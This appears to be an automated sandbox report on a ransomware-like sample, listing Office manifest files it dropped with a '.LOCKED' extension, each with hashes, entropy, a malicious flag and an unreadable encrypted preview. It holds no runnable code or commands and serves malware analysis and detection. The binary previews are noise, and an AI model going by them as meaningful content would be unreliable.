                                Preview:....O(...l\5.7t......!w.'.x...q...-.g.7-..-.....J...Ly&...T2/.m...nN.A`"..)\.Ki.8.y....v.I.UM:......er/.;.....G... ....)....)k.e:o......h3m.V.Y..Ve7D..B.(....Rp.v.....?R.i....%..]..j..E.d....y...G..#Q..y`.c.;...P.+.7... .vc...x.K.b.N.q7E...I....9#.6D.X...^.|8@Y.i 2....~..DJ_...'.p.H...O....<.U.lJx.X}...y.d....G.6%....V.-6XSn7.26.8......]u....+...,.5V.2..Y.:......"...l.......bj.j....F..Mj...A..+X.\...I.8tX..?{.X@..T...32bm5..8p.=|..R... .=z.%.'.;[c.(.DiI.Qa..q#F..H.f.V$.Bejh5....$L..$Fo.....%$k../.uV1..p....xpXm...~2...z!,..}2..z.`9.l......Bis.../...Rc.....fr]...=b.P.7i7...7.bS\.n]v...e.B"..g......6.H<...6..e...`...GZ..X.%........c..7.b..J.#.w...Wws......c}Rb....J&!....J.n...LQ[9.}.8km.e...!.J.*...u.....H."b'N:...o.(3..:..k...aR..6../&M.n......{x..X.)..'}.5'+&..S.\.J...@..Z..(..\T......tY2W....s1.............\..7"+.xS.].K."...dm.Ev7yE.x. ..+..O./....J;.c..G.*.EAY...*O|.....d..|....|.1.w.._..+.Y..)..._.)..?+.ln....,....05..o.D0.._Eq.....[

                                C:\Program Files (x86)\microsoft office\root\Integration\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):17556
                                Entropy (8bit):7.988576764272021
                                Encrypted:false
                                SSDEEP:384:JoETATe6bQia+0yu/dsEc883+rnYYXW5pqxrgm57L9Y2fDJQW3+VOdW:eE0CBia+0yBEc8nYYXYp3m19Y2fDJQWs
                                MD5:1F70ED38D5468CC2F8327CA7A171251A
                                SHA1:F84A869E5C2684EC33EC3DFEA5746BB1C63F8FFC
                                SHA-256:349470F01A27A1FD3E29ADB7A86695C12C13FF4640A732592CFD869CAD0FFB13
                                SHA-512:4BCF6F5A0477AE05E9548B55D649716FCF4E25D163842DA04045E50A88BE3B3F1D8D0CCC2456BEC32DD52538C0944A84B3B5D4EBF29069A65228894B9B2C21A3
                                Malicious:false
                                Preview:.H.....V4..j.T..f...o...=..#.v%g.L/.=......m..i.H......R;..j}..fL..')W.|.,......a?......f..o....#a|9...<.%...J.>.$.I|l...d.u..>j....#0z.....rC=...P.I....q._...D.....vm...G....Y.....b...O&..8ot/....:.nv......k......o+.....j..!...|!m.61..|)..~f........p..U...........B.&j....,..g...6JZ..D..z.%5A,j7{.g7.7...I..C{.....0..<b.K.p}....pAGfn.V..W.U.8....3.....D.......>....=b...Z=R..T..3...OHjIt...0.L..&.{.C.ae.......8..L...<*8....%...\aR.X.........h//N..'.]....ON0d..N.x...|D+....|D.`.....4p..%.e......p....i...x.$7OB.d+}...*UX.U.g.....NhF...-..a.3My..Mw.G9.....LJ.|..v.0..,....[,9n....i.]..A1I;_Z~...glM.'......P..)..w...8..Wl..bfg#{...f.s.!...U\.v2.PY9E...8...u..".._..J(.{;[.^..%7......jB.`....|Lv&.v..s..X.(.8...$.....-~....>..Z.....q.N...,G*Z.V.N...$cd.+.B.x.:#A.{.....?.SJV....u.!Djt...}..fn.<.\.-J.NZ..v....y.q.B.g.Bo6.;..q.W.....<...lmV.!..m.7."[..6...........!...~. .K.i...3...zjQ./.*..M..C..8I..0.|./j..7.:.CK>..-..... +......C$.5..Ke.U~..

                                C:\Program Files (x86)\microsoft office\root\Integration\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):174296
                                Entropy (8bit):7.998846328690469
                                Encrypted:true
                                SSDEEP:3072:p0i/znyZxuUDXVCCbFO8hwM2pEoLIfydqn3duEAp3SmV3jsj3hhBX:xLyDudCbFOOwM0EKkyFEAp3JV3jsbhhl
                                MD5:F9D8E290904397A6590A7BF305B94E88
                                SHA1:F43CDDE51AB71D77FCB5C7C57A4118B91055E4DC
                                SHA-256:0A6D5E38EB15FC397E108E75A9BDF3A22DB872E51DF8079BD9D57A377AFCBEAF
                                SHA-512:994CAD0BAE2ABB90135A5A2BD1D1181C8E8FBC691D7D4504AD3919E32A092424723B0F363C017BD566A15F10C58023173463544235278022738C7D55D4197058
                                Malicious:true
                                Preview:k.v.RO..f.<b._[...@.'!....n..fy....C....j..8..7?(...Z..u...'...?'JN.H.Ex.L....H...%*:v8.......b.R...E.351.....(..^...`.w...{Qg#-..Q+@#..:h....|.{.x.....K.N._.<mv^.t.XI.iF.G.Rh.....{yf..Oap..q....J.o.g.!Z...P6_D.Y.3...9..z...8....M..1U4..._......g....a.....skg..ww...A.U%. ..Amz..q....H.tM..UU..,.(./..y...u.?..U.%c.Y..........18..f...$ ._...o@vCx.O.pL..V.."....c...J..5..a.`..`t?.1...6\......xzB.u3?2..\:..'.!....LL...q.#n`...nC.....=..i..*%7...O..]..s..<;_.q%W2...f...j{J..#).5..o.....N..#.u...Mw...........3.2..7p..qH.... *&D......1.?x....%....Gh.w.F......[oc..s.......1M.(...5:..'[@...U.....8.....t...Im.,....B...z..^(.t...bb.xC.....,......AN..DY...s.1..'.?.. ...-a]a..F.f..."0Hw........1..s..M..K.n........O.r.s.....ge[..E..nY!...Ax...oq+$....O..-.x.r...k_d.."z.Y..:`.*]H-bW".b.4<Q.1.Q...-......8.:y.Z...?(:16.cK.....d.%Um....l.d..0...Y.`....%..$..q;_......\"..Q..j9..I.-._.A..!.x.\Z.nU.....A.Vz.q...m.8.*.u..fPH.w.5f"3e.......N%].....2..0N....,....,+..

                                C:\Program Files (x86)\microsoft office\root\Integration\C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):95054
                                Entropy (8bit):7.998035396213496
                                Encrypted:true
                                SSDEEP:1536:7m6Y0vdJWyhFOZN69kYga4f1q2l64k5/djTdOwlqDyDEU+5tNc5J1NfwAEZHkl6:669J/hFOZw9kYLY1561/dTdah5kdNfd8
                                MD5:375D1D72A2004CE8015D8B65C8E330D2
                                SHA1:7F9FF264F88C55292A22D8EF3E34A1649E85336F
                                SHA-256:FCE399C7E06D771148FD43C66825C8D1E51EFAB545CA3ACF542776059CC36555
                                SHA-512:5ADD5010B77766D5A3788EE298E03CE5462F52E314B66A2155BA2C24BC589CF9AB7E65888612FD6DFB9C3121D6D15EC3741AEB836E0F416F194FC7FA684370B9
                                Malicious:true
                                Preview:.V.G.....&.]........L.G.i.x.0.@.|Uh...W...f.S._.........[.M..W..."...o.p./..T(FY..'.U8........_.q...3...1.R.<'B..Z.tee....... ....x3.a..I..#...f......:.~U{#._......#)e..@&...w.$&tJ.da&...~..[..1...G.[.....,.h."~...]..}.1].)~.r.x[gd..DR"m....mU.7....1;E6.|.[{x...x...D......G&...Os.]..O........~.F.@......^.j_.o(.!..8.H...E!......W..G3..B......uD%..N...;...-.(y.@p...]..jx..6...^.m'..7^f.....%.8]LUaK...[..wF.zE@K..%._..li}.`S...tY:D.wm....k$.WX.|.O..}.`..GC...5..w.........Q......XS.4|.c4....'Zv.d..B.8z....sOT4..8.A4...z.A`.Zu.....{.(.E.....B...P..9.Tt.(...J.uRd....X.&N.q...T?;1qb..X.'Qc.OX....e...]bQV.F..#..NG......P...c....X.........[<"..l4,....,a.....\...g.aa....K>.G.....F>}u.&...P@i..6...+#....h.x..}.V.'..c..`#5.C..?.~e&...d.i......y..Oy.K.......<l.b.+...%.......1m...<...W..;...P..U$. .<.iD......l...X.yT........MS.....2.O?..+;Wx~C.!.LNZ.2.r...)Ns..........:R3.w#........:(....7zPr4 /.jS.I{'.^g..c.9.i..#....@..gY.......'k9hM...h...$.$...d}q,....

                                C:\Program Files (x86)\microsoft office\root\Integration\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1664
                                Entropy (8bit):7.864028799957495
                                Encrypted:false
                                SSDEEP:48:Jqr7hqR9rGgod/zoS4N7/WyYu+MAVMJg6TO:JqPMHud/0fN7evuAVOO
                                MD5:DFF54B9CDAF3B5A65465F459841F98C1
                                SHA1:64DB3E7BD7408EB5D282DCDE3330D0DF7A50F493
                                SHA-256:54E48D5067E71C2AC04777B4EFB5923B0631A1D1F233037358F65932DAA10249
                                SHA-512:8996907737534661A06FA44F3400DA9858D95A56B7D9A28D309416CBEB80D1DEB9E463C563A7488CB21DB7C5E1F8F8AC5710E87850DE8A708B700F535684BDF6
                                Malicious:false
                                Preview:*..y..H.N.j/H....E......s$..ZB..k.....L...{?.o...Gn..C..R.z....U.*.{..^.|..X!.J..Jn.1....../.r....o...).lr.C...L...Q<."...0...=...A.....x..5.,).t.......N0.{...Y.5.e.gV;....2+.l.D(7..e!.'2..D.>m../.u....t.{...-|.c..0..............Ig.......&Y..h...7.5m..649.s.......G..*.En.o..Z.@.9.$...}8t.;..x...(.....$]o.LX.....%_rs....n."P.....k...3..!Q.S.eU.......].#A..[..-.....B+...F.#B.@p.(.`.V.......v.......|L.....P....V.8.N..i....V.....<..x.j5B./..xXv_.8.<.......Xu.p...55...wDbLV.8.O.5..-4h..G}.X7?.R.......VOm.sC.+Us..R....#"..nM..........i.-{.z_B..v(M...O.F.....mE.-...h..u.B\.ma6pB.B........K9.~}........1.c......'...->7.=.$...FT..DI.....E.....=.8.Z./.9.8s..j...."c...8...KK@d..~.4.L.e.6.T.r.....i...B...0+...F.....5..(.I..G...uAM~m.t.C.....X.+L..c.5F0......k...4f...!...[...u....d...h^.U.X.._9],.....i..9).HV...+...u...P.f.%..*1.B.\E.`3.jJi...b_2.0.....B.6...2.....p.5...OM@(....'kjUn..1..../.06[....ne...]r..W|k...q._..{..............|...o....Nw..>

                                C:\Program Files (x86)\microsoft office\root\Integration\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):102314
                                Entropy (8bit):7.998057581169843
                                Encrypted:true
                                SSDEEP:1536:iee6oaPeOoD7lpcS3ZwfeTUP34ZrLRu5khIlUPPBJeIF0oaV7g5g+LB:iee6Pe/5wfHf4Zr5ClUPP6IF0oaNg68B
                                MD5:31B4995447F6FDE0D82919B7267FEF9B
                                SHA1:F01AF399923C7BE4649158767B54E7F7C42CB145
                                SHA-256:CD74201D6E8B64D0812F599DADD2FA1D327D61EFB57A829370C3A2A0CCE8C40A
                                SHA-512:9C22E835C21D4583F0A7DDFCD34ACBDDECFF053FFA460DAFFB1463EAB25384DE1379388C5E07168C32394F6E1034C5B74EF7924729DD82C24C34C6F76DCD9F5E
                                Malicious:true
                                Preview:.K..2.{ro.t........d(.......q.ib...;..D;.u&s....m.*..h....#k..q$..c.U....;..]..,....!.G......2.........AO........1.n....,"..j.`9..^.U.M..p......qM.V.....s.....{(..x..&.....(....I._.....\.^.Y..T...u...mA.S..D.#.N..1.A..>O..3T..b=.c....I.$..BKN.....}%.6~WUV..O.e.!M..8'.&Q.d..3.,.....UM...(b..2.k.`"=\..D8...,.&4G."..\.....)c/?.h0..m{...s>.X._.F..IL....'.*..........xbF..mRq..MB.6F.NL*...O>..c.>G.fA14.I...K).Ql.6S"......]Wh....;o...l.r..R.........w4hc.....K....Cg.#..Z.r.&.E..E.C......:..n....,....p..^..S;..1.$..........,...]1R.Q...y.....I.ZN.[.x...lMp.(.q.JV...5.z...o.y7.G...d.....|*|.....v)N_.t.;[H.....i..Z........F~.`.....R.....$.Xd.|A.LE...h...;...9..m...E.w.Q.l.p..J\.;........).....%n.j....T.q.@....J..Ie..............7U(.f..._gj.g.fL....?..N%..1...v.G.~..;n}.fP....Q.......Z/..b}.R....R....5$.>..6a....N..d.z<.EBJ[%...%~...Q\...C..-\K...:...i...h...KA..v...8.R..........<J.-..d.....&..h........b..Q{.*..^.@..3.U...+a..^.n..BmL.....

                                C:\Program Files (x86)\microsoft office\root\Integration\C2RManifest.accessmui.msi.16.en-us.xml.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):59644
                                Entropy (8bit):7.997026631063287
                                Encrypted:true
                                SSDEEP:1536:0faGhYzDN8c1dG5cPuIDeW3tMBTpSfEGfoq99IFrgB:AaQWN8eG5cPuCpfEsoq3+rg
                                MD5:E95DA8EA0DBF3D3DB43136DF5ACF60A3
                                SHA1:9919DA0DCF7442A064B5CA06335EA789916FF34A
                                SHA-256:296A30821A4F6CE84CE3049E55A54E7487E34CA412FB6DD1C07B2AFCBB720C84
                                SHA-512:0D169DBDFADD31E1C6C3D203B7807DBAB44E1CDBEC28FB4638D4985CDCEB1F72D39B8D4A1D15B47F03E16205D0B515D174B71FA6DFF3D42F3BCD23E848ED9271
                                Malicious:true
                                Preview:...C....V.._.R...W..P..p#.@..sN[...{.......$...>S..?..hr.K{(..N.Z.....e.F...}<.......)*.Il.J.f..NN2..."X.xi.9.$l..J4.,r...........H....M.7t]...%X*..........ES..}...ym.<..).......P..[n.5{d.`.X./..........T...4"F..|..\!.n .....9.<U.......}..nR...O^.xG%c....i.s]).06am...y...r...s..X.ST...1;..m.t..[-\Q......-k..*...8...4^.N...$....Zm...0...f..=.$.....|p..~....\L..u8L...!....Xy.+X.=].....H..wy..o..a]..q`..h8..."+...V..KI..<R]1.gZ....aU...jt...y........BX-..K.....v.<..}6......,..6?.j#r.8.B8mW.R.....t.L{.... .F..0%.#@....\D..~k4........R.zN.....=R.J.l1|'.p.X.^`+#.#......R..=s-...GK...m.r.6.:+.~.D%.....I.{L..|w.b.@>~..&.=...6...7..5b9..........C.O...S.R..%`6.5...;...b?...k..Z.!]..$dU.[.m..?g,...7.B...C...n.UG......D..d.....H.v..%~.'&.......jv+2.L....,...a^{.&f..zYz..c.,Q...(.._(.c.......M........z....}fd..[~.aO.....[..K...........V[.\..i)...g.X&5eC....5. ....VTx~........R........>......d..ZJ....k..Xyc..C.0d...9.;?S/KaRO.Yx.X/.-!6.+.._FU.

                                C:\Program Files (x86)\microsoft office\root\Integration\C2RManifest.dcfmui.msi.16.en-us.xml.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):10422
                                Entropy (8bit):7.979736095838601
                                Encrypted:false
                                SSDEEP:192:kczuwl8xYIH9hwfUMqTIqf+pNu79aCD6a35nXa4q5z3WmxD27XkfeYKa2+VOY:xF8DK+TILpAvDXpjUamtgXkf72+VOY
                                MD5:BAA2885828BA89C1F946156AACE71E51
                                SHA1:0C97D0178C0631A9B2189CC89CBCE8C1652E92A6
                                SHA-256:DC45A59D27D59C62016EF288151CB6760B3030AB6A4834912BCA7293F211D0B3
                                SHA-512:B748428A0516FE238B1789E2457A540EC36769408213BC4BE9529AC0224A09327CE8C971147CBD1F7AC8B7451D73F7D557B1F14D0A51751C5D307D53C74E2F18
                                Malicious:false
                                Preview:)......Uu..o"UX..ug.El.&<o.M...I.W..;\4D.<.B.i0.~.b.dZ.[.B....9.7. [......V.+V.x..7...J.+c.........`..`jt...8.xi9nTZ..pDy..L..p...z.f...o7.......o...9z9.....E']..Q.."...f.F.)..d.Pj..s..D.*.fU....Nj..`..n......ii.......E.w...Z.......0.*..gfY.........".>..@..!.N....G..D.fR.0...Y.sR.n..h...R.Z...D|.e.(.Tb....j$.X,.*.....;.0W.u...R?u..d0.w...Sd2=O;V1?....Cb...&z....V?.........S.....Z..l.9m.P.....=..us.cr.E.[`....X..:...~2.......d..F0s..M.1*.....r^.t.....s...PU.!k..U~.F.:.}.....7..4x.57l..........O..s.C-.]....q.....>....A...].bs$_(E..@...GQ..F.*..k^.......<......9..2......P...L.q.c.m*.........9...........x..h.6..0aN.L...?...0..r...p..*l<(.\.g...0=.G....i..?..0......?T..{...q.n.s.*....C..a...;]....q...#.0........hI.wK......uf.<Xf:..fE...(.(p.|.#?G<...x"..........5....2.x......}...=.Q...%.`.......jS.#5.c....V%J^K..De...)....e...d..:....D6R..g..z......].b+._m...u.}..Y.+......^.....>l.&.e... ..".ib.K....O!..*.w.....F4.#..$.<.F..F_C

                                C:\Program Files (x86)\microsoft office\root\Integration\C2RManifest.excelmui.msi.16.en-us.xml.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):38578
                                Entropy (8bit):7.995191232608667
                                Encrypted:true
                                SSDEEP:768:/6KCTd2m6fr4LyK8JQN29ZzhFd0yHVh29Hfr/pjiIubVq:FLV9QNeRhFdPH2pGIupq
                                MD5:7EE8AD824ED06B5ED1DA030B70DD410F
                                SHA1:9690CD6723C2A3388203C45E3CDC239380646CB1
                                SHA-256:3BA05D05EC0C81CB4740F3721E97AE3210909692F56B751B2CB856C98078D45B
                                SHA-512:604FA0C1CE3ABF0F0E29A7E7E15F292E93A099FAA856C12B0EAE38AD31E634AA23B42159A2463D835476D562BFE7AC2649ACA5F5C21F34AE9A486EC61F9D2781
                                Malicious:true
                                Preview:?d....K0...k9..$W....A..*.4.A6s..yp.^z...!r.S.I...I\.%}....C.gj=v6....yD..ID..W0{p..." ..lF6...Q...rP.u.}Fu.x..]...V....r...w..Q..6.....F...d.q..D.'=y..IY....f..,s.~....b|.t......)... .:.....i.....H"Ye.Og.AAn|J3&%......}..a..hd..J .'P.R.[....\.~*C......:6...p...|.-R8... .k...~.l..7...%.-.p...4.....!h{.B.q.....r,.Q.P?.D.....K~.....c.).;bs.k.7....K..;..6...).GZ=..L...,.I.'V.`4.F..o...8'*.S..[..g...S.T#..X.+.xEm.......0..b...I.......2..../gN...}..:P=..Z.f..<].r..G.+{.{...]3h;.......>...].....p..j.......l..n.FS,.O...y..s.L.i.\d..K{..Q....ERhm0..8..JZ..$...b....tz$...QL.*w....G..k.l....&#...6......(.W?..v......1.?. ..c.gas..C..jd.<AVx..7^.........Q....?(....TA.........r.....}-s.+1...;....y2):.........9..L.s..X.8.V......|.5B...S1:....{.q6z......Z........D$..O.{.5...zF8B..|..7.,...*...;..vU.......o#..&.Y.~w:.>.#..v...=./f.P..d.+2R\...<.!..&....d..R...........sG'Wa..G....(.....AX..i.8Bc.?<..45.d?B;...5..0...^.x7..q(.5..K..zu..(...zR..N./r

                                C:\Program Files (x86)\microsoft office\root\Integration\C2RManifest.lyncmui.msi.16.en-us.xml.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:OpenPGP Public Key
                                Category:dropped
                                Size (bytes):22666
                                Entropy (8bit):7.993147555732763
                                Encrypted:true
                                SSDEEP:384:qgBSQ7A1Q+m4YI/gMKP2tr2qECSUuzidE2XMtQ4skcCU3suzIslafyXkd9wX1P+F:qPQ7mQ+m4Ybp2tCqEJDz4EKMtN6CU8uA
                                MD5:573655B6C9ACAF9598501E7E7C2B14F4
                                SHA1:110B1F5D0390ABF635A45297EF13C6DCE3A76A4C
                                SHA-256:59A32174D33372BBC58447BE6CB35BA2F1FAE925A4416E2E820B1E2BFFDAF8A9
                                SHA-512:83680519B13A02425669E285C674BE51516371909F8EA8BD04E0A9AC8550F2733AD905748DA98C3D3DDA9946468E91EA024110C6657BB1B36F452533EA3A78BB
                                Malicious:true
                                Preview:....DX...tV.C...F%2._`..b.....&...h..[!.+...k+'f.5..r..S.....2....4RJ.b<..V.?.>....P].'..Sh.{..;.._.....wt..a0..Q..a-...Th..-..n..I..v.V7..^...]................./..|.C1^....m.n...o...f.m.R... o.4hw...W.64.B.T.>.2..8%%..B)........:.a........i.../.R5|....W...;..`......O.!.s..P...{.XO.B*...]....Mp..W%.... . v=.F.i....>.....W.k....W..t...d.........0Rn&..\'.......u.....H..K=.......V../--.WW..Nu..*..F..D..r@'....U.E)J.M.X...n.;%.s.A.6u"dR.H..B.+..{.w@#x..g....]G/Si.....E.g.......>.g..s...........ZW.l.."...Y..a.h.O...>.@.Q.......T9....At.<..ov%-K.......x.U...)..,.C.re...?V.n.;g......_..cc.p\..Yj..\...ze.g.rN.8p..C!.}!,|..Y6..@}.0p....RC%..*Q..].\...R...?...:.......w[>.M.Z..T...pG.+....g.....Q.e.}T..c..<-B.a.P...."...V..I,\qE....b.HW.k..(...R....X4.=i.VtPL&..P...Q.....b.2.......=d......'.8}..b.G.U...!X...k.+D..Gj....K...R..A.....C.A......H...65......J.../.(}X....~.8.MjV./:...$..IVn..TQ.3.rK...{D.p...W.4....m%J..g/...q..z...

                                C:\Program Files (x86)\microsoft office\root\Integration\C2RManifest.office64mui.msi.16.en-us.xml.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):12026
                                Entropy (8bit):7.983765093066229
                                Encrypted:false
                                SSDEEP:192:FhIaBS88bciBfg6IK7JegGyFs87NJqOYnDIJIGAlcmW0aGSYrjvWPhr6gBBCjQ+d:FGaBsbcNlYevyPqOYn+VAlcmnPZr7WZk
                                MD5:A59B2E80BDC96E1C3A29AAF037CD6A1E
                                SHA1:2BF46B92497D4D002864A2E6D6BD7164CFB2623E
                                SHA-256:429DF0F478413CA6EC7F0FE453F9E68B0471C94FD543EA46212C9B08B0AF86CE
                                SHA-512:B69986ACC020EFB784000A497AC68A0BE204C81CD90FECDB958351081DAAA10C859F18B951AC217743A4477FE11CD7FA9713C544343A5CC604F57BAA88539F6A
                                Malicious:false
                                Preview:-../^....e..z..6.e..*a.un8...~i=>...Q....W5.>@}...4-T.Z..Z[5oCD..'gl...iEas..K...D ...4...Be....5...~;&.p7.....N.!.q..H.Q...TL.[#."..(a..,B~G..o.!....#.%_..tQZ....=N..W0$.`...)Fr..jP....S..3...m.XB...l4...G....>".7Q..Q.9|Ww7Bh......R*ir.!5){....R...nPxv.......HG_.,CW.G..6...Z...P....F9pq..N.!..5.Z..EH...x.fJ9......?.>.....u....._..!,.'....^.....V...v...I....gT.$.........q....&. .ZRHy.BW@....28..!..v`g>.d..2/..PVr.|A....*..|.4....eQ....F*..r.f<e..N.y...b.....c+...}9......"}B.W...A.HC.K.l.......@I.....`..j....>.(..N./..._.0.].2...2..j.D.W.Z.....[.j..C...~.(......7..r?..\?E......I4......M...Uj=..(.'h...W4.qNU......kv*.tY.R*.G8...)xx..JK|.?+....;.o.....M*...o..79.......>.w/.\0...v."PV5@t.>...Q.j....f)j..z4.....'......E...{l'._R....Z..V...N...<.+..2F.,;.....B..:.MX.5~...;.A..W..<....x..k.!..)".E..E9.a.Cq...w..W#.....-J..d...../.....<.$....HjQ...!-K..P.....sEW.O.....i.x_.^..7..5J1.$4.._.<.....Y.../.3C.@....l..T....X. .[.K.8...e=.<.|..

                                C:\Program Files (x86)\microsoft office\root\Integration\C2RManifest.office64ww.msi.16.x-none.xml.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:frozen file 1.0 (or gzip 0.5)
                                Category:dropped
                                Size (bytes):284718
                                Entropy (8bit):7.99927748311118
                                Encrypted:true
                                SSDEEP:6144:10FLhvenrrY10Vfz0wcepOMRuZJkJngYSjckcnQ7wUcTuV52G+UBhllXHT+Sy4gv:gL681ifWNMYZGJngYU7wvGbBpQv
                                MD5:CA2046377FAB90724AF62494172405BC
                                SHA1:0A18F996865E78C2AD5147D6E471145965A2DEE9
                                SHA-256:8DFBEC73187C7F906EBF6B5067FB1D333EEDBBF6627B4876A77E7CA7232246F8
                                SHA-512:81E9ABFFF166181B9C825C6E8E0FDB3FEF8BDCCA981898DE04C8E5AF598D3FEA15382BC5A511A2C802906AA31EA64E698678E0CB0209CCBB3C404C0188FAD138
                                Malicious:true
                                Preview:.....].`...$.x[.^.Y..#.KX.....n./.K..h..>.e.X.pW..XV../.O`b@:.t..T.aU.Zg."Y.~Q;=.*...[..)..1m....'..];..).i....(VI..7.,~.....;.\l..;6....}.w.Z..h.bJ...?km...J...qQ.=Qd..t...F....c.j;~P.pk..e_..V..k<..19...wi..T.....x/N.Wzy....#.u.X.]N..*..../......K..t.9..w...LC.0.y.G.Kv.L?....e.z@.q(..J...C......?:j..).,...Z..zA.@.\.Z..S....g.....VU.6.i%....J....v.}.[..g......L)..]...Y.o..a, .,_...l`..m.....5.>..1a.K.m..>...*1..z.r..Z<.WP.k.W1.<..o../...$.l.s;..U9.R .(~.....?m.2=....b|..7. .O:.Gl.UH.T.GR.il....}ZR`%.<.....-...I..S.g...S.'.f,!.._.k...'..M...$..(..r.DSx...'..".V..c.Mb.x+..].&...0.@.F.N...I?"......j.pE....S.8.....G.f......3.......]..u...r..2$.@....>.......Q.T.\..]......L....g<.....'M...)2..K[Q..x:........%..,v..=F!....X....d.T..:....w|MX..p{:.C.0.9.}C.}.....};..c.V.8......H.d.3S...#...TF...JV.r.V4..E2.}.. ......O.H....(.^..m>^.?#S2..CYZv.F+|..OD.x...&-b.?"1..".$_....5.....O.dL.%.)jp..6.6.c=..E..cB..XKD....!1n..1.p5.. .......Xo.

                                C:\Program Files (x86)\microsoft office\root\Integration\C2RManifest.officemui.msi.16.en-us.xml.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):134572
                                Entropy (8bit):7.998596058701348
                                Encrypted:true
                                SSDEEP:3072:o6vA3uGTuPa+3NNuHMEv4OW5oPHITaM3o06VYnJ201Qd:o6vARG9NYwz5kHwpVuYJSd
                                MD5:F3CEE3CB8266BEC45FDAFEAF4546AE98
                                SHA1:A4871B87AFB738F67605ADFBC000C44E9EC306B6
                                SHA-256:0B27CF5274C03F962035F398FD043DF39E0424238219EDEFFBBC9C4BBDF79CFF
                                SHA-512:12ABC79EF827FB417E939BE71F967FBFA8A68B371027DF7ECF45C3C3C6E6F002A17D9AF1BF0ED5B796C46C7570FF12182DCDC66269143DA6AA88BA66B0EE48AB
                                Malicious:true
                                Preview:7...w*.(q$.........H.RK../~.o.6.1D2.......8..$.... ..yfe.1...+.d.,Q....t.....-...y......g.V..q.//..$...]...!h.3f_S...._..T.....A....+.?[Y...e.....D....4[J..I......k.c..M.......Q.MP...-.....h.Y.t............s.n.......K7[....pW.....a.z.....V.+........a....G....~B|@D..Z*...0.k3\[.._.....Q>{.3....f.."...@....../...8.....0...).}d...?>....%.w.!......D......%N.:.n.&8.....fE)8If..*..F.>...N..y....U.%."..O.:.r.N...e..._M...&m.|.:..).)2..E}...7..Q?.0...B0_...vU.f...0.l..v!.W..2 v.....A+.._...zN.i...;>...T.....X.[.+:h..Va..L.}G.......In.y.q.7|.O.Z.....N......*.%..rO./.....8...DF.%.......Iig.^...>#..5#......#.{Zy.;c...";i.....:t.i...E..w...F..&.......OR4.\.{s..GC1M.S....#$.l..x........,.tL.m_......]..e.Z2..k.K?.....7....`SC7.....S.... ._.e..Qt_j...../..".._.M.I....%.f....c..<..8q...+.........:...b.n.y...).F...n..6......m......?....?.O.*.....w...$h.t..+}xy_..Y..'Y...... C4;._....-;...x..!C....Q.h.7.N$p.Q...b..4G._......o..S1.s.q>...R.l..Z..&z.s&Q.U...T...

                                C:\Program Files (x86)\microsoft office\root\Integration\C2RManifest.onenotemui.msi.16.en-us.xml.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):19018
                                Entropy (8bit):7.989987692791979
                                Encrypted:false
                                SSDEEP:384:wYfBAnOku65OAtmQThHFbenphmKb8ksIQNKqIQ1C0rNsR2pAU3gK+VOf:nqOt6gURbophV8ks1jp1tNI25wKj
                                MD5:DDB43EB4AF6C76DFB83E49765F225E4B
                                SHA1:30ECEC9BB989B9462A4653F0CCB19C0FD26622C9
                                SHA-256:003B8460E4B04D0F995C8473542023CA0CE6770B9029FF796F2B582214A1DFF0
                                SHA-512:C81401A44528E720A4DD6E16B2499A7E995737193FBDE48F2EF2C583740F27B0E77296AACAE9C68D6B66C89024FB8561A64E4F03E7FC14A006792B6710A64F09
                                Malicious:false
